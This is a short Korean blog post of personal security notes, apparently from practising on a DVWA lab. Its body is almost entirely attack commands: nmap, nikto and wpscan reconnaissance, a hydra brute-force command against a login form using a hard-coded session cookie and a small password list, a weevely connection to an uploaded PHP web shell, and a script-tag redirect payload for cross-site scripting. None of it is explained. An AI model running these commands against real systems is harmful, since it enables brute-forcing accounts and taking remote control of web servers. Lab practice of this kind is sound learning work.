Notice
Recent Posts
Recent Comments
Link
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | ||
6 | 7 | 8 | 9 | 10 | 11 | 12 |
13 | 14 | 15 | 16 | 17 | 18 | 19 |
20 | 21 | 22 | 23 | 24 | 25 | 26 |
27 | 28 | 29 | 30 |
Tags
- Redistribute
- GLBP
- rip
- NAT
- 헤더
- OSPF
- ospfv3
- 라우터
- stp
- Vlan
- DHCP
- vrrp
- 장비
- ripng
- CKA
- 명령어
- eigrpv2
- ACL
- eigrp
- Etherchannel
- OSI 7 layer
- ipv6
- crontab
- Chrony
- 스위치
- tunneling
- Inter VLAN
Archives
- Today
- Total
Net Eng
보안 본문
sudo su
nmap -sV -O -sS xxxxxx
nikto -h http://xxxxxx
wpscan --url http://xxxxxx
vi username.txt
minseok
pablo
vi rockyou.txt
password
agafafsa
asdasdadas
bfbfte34
hffgh4524t
gfdg45325fbf
fy4323
hydra -I -V -L username.txt -P rockyou.txt 'http-get-form://xx.Xxx.xxx.xxx/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login:H=Cookie\:PHPSESSID=v453o5b4nscgm49lbjm2m10e14;security=low:F=Username and/or password incorrect'
weevely http://xxxxx.xxxx/hackable/uploads/minseok_shell.php 1234
<script>document.location='http://google.com'</script>